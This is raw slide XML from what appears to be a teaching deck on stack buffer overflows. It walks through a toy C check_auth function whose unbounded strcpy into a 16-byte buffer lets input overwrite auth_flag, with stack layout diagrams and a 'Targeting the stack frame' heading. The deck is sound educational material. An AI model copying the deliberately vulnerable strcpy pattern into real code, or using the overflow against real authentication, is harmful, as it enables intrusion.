                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 522"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621175" y="1595425"/>
            <a:ext cx="4110000" cy="889800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In which one is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exploitable by stack overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Shape 523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809325" y="5692425"/>
            <a:ext cx="3476100" cy="1022400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think about what gets put on the stack, and the heap, and which way they grow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Shape 524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621175" y="5022500"/>
            <a:ext cx="4110000" cy="889800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminology: for an attacker,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> return auth_flag;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution control point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in one of these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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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Shape 529"/>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Construct their stacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Shape 530"/>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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Shape 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4722769" y="1757700"/>
            <a:ext cx="2050200" cy="4770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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>auth_flag variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*password(function argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141369" y="1757700"/>
            <a:ext cx="2050200" cy="4770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password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>auth_flag variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*password(function argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Shape 533"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3341750" y="1712900"/>
            <a:ext cx="1266300" cy="314700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Shape 534"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3341750" y="6208700"/>
            <a:ext cx="1266300" cy="314700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</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Shape 539"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Toy example solution...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Example was from HAOE book (pages 122-126)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>auth_overflow.c	versus	auth_overflow2.c	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>int auth_flag = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Shape 541"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034000" y="2279988"/>
            <a:ext cx="4110000" cy="889800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Here's </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trick:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data writes this direction in  source code in vanilla systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="542" name="Shape 542"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4757400" y="2813825"/>
            <a:ext cx="0" cy="2391000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="114300">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dot"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="541"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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Shape 547"/>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Targeting the stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Shape 548"/>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lang="en"/>
